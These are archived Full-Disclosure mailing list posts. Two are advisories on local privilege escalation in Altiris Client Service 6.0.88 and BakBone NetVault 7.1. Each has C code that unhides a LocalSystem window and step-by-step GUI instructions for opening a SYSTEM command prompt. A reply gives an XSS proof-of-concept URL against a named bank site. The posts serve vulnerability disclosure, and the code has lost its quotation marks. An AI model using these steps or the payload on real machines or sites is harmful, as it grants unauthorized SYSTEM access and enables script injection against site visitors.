When a password is set to protect the property pages of the Altiris
Client Service for Windows it is possible to bypass this and disable
the password protection feature.
Vulnerable Versions:
Altiris Client Service for Windows (Version 6.0.88)
Patches/Workarounds:
The vendor was notified of the issue. There was no response.
Exploit:
Compile and run the following code to unhide the Altiris Client Service window:
===Start Code===
#include stdio.h
#include windows.h
int main( void )
{
HWND hWnd;
char szWindowName[] = Altiris Client Service;
printf( Finding window %s\n, szWindowName );
hWnd = FindWindow( NULL, szWindowName );
if ( hWnd == NULL )
{
printf( ERROR! Could not find window %s\n, szWindowName );
exit( 1 );
}
ShowWindow( hWnd, SW_SHOW );
return 0;
}
===End Code===
1. The Altiris Client Service window will appear. Click Properties.
2. Click the Security tab and uncheck the Password protect Admin
properties box and uncheck the Hide client tray icon box. At this
point you have affectively bypassed the AClient password protection.
3. Click OK.
4. Click Close.
5. The AClient tray icon will appear in the lower right of the screen.
Right click and choose View Log File.
6. Notepad will appear (running under the context of the LocalSystem
account). Click File, click Open.
7. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe. Right click cmd.exe and choose Open.
The result is a command prompt running under the context of the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Privilege escalation in BakBone NetVault 7.1
Summary:
Privilege escalation in BakBone NetVault 7.1
(http://www.bakbone.com/)
Details:
The nvstatsmngr.exe process, which is a hidden command prompt window
that is permitted to interact with the Desktop, can be manipulated by
any local user to escalate privileges to that of the LocalSystem
account.
Vulnerable Versions:
Privilege escalation in BakBone NetVault 7.1
Patches/Workarounds:
The vendor was notified of the issue. They are working on a patch that
will be released shortly. The patch will be made available via
http://www.bakbone.com/.
Exploit:
Compile and run the following code to unhide the C:\Program
Files\BakBone Software\NetVault\bin\nvstatsmngr.exe window:
===Start Code===
#include stdio.h
#include windows.h
int main( void )
{
HWND hWnd;
char szWindowName[] = C:\\Program Files\\BakBone
Software\\NetVault\\bin\\nvstatsmngr.exe;
printf( Finding window %s\n, szWindowName );
hWnd = FindWindow( NULL, szWindowName );
if ( hWnd == NULL )
{
printf( ERROR! Could not find window %s\n, szWindowName );
exit( 1 );
}
ShowWindow( hWnd, SW_SHOW );
return 0;
}
===End Code===
1. The C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe
window will appear. Access the window menu in the upper left and click
Properties.
2. Right click on the word Window under the Display Options and click
What's This?
3. Right click on the help text that is shown in yellow and click Print Topic.
4. Right click on any printer and click Open.
5. Click Help, Help Topics.
6. Right click in the right side of the help screen and click View Source.
7. Notepad will appear (running under the context of the LocalSystem
account). Click File, click Open.
8. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe. Right click cmd.exe and choose Open.
The result is a command prompt running under the context of the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
Assistance from David Rice drice[at]tep[dot]com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS
http://www.deutsche-bank.de/ir/index.html?contentOverload=http://www.deutsche-bank.de/ir/releaseliste01.shtml loadFlash=http://www.code-foundation.de/zeitlich/foo.html My 2 cents. Cheers Dominik ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
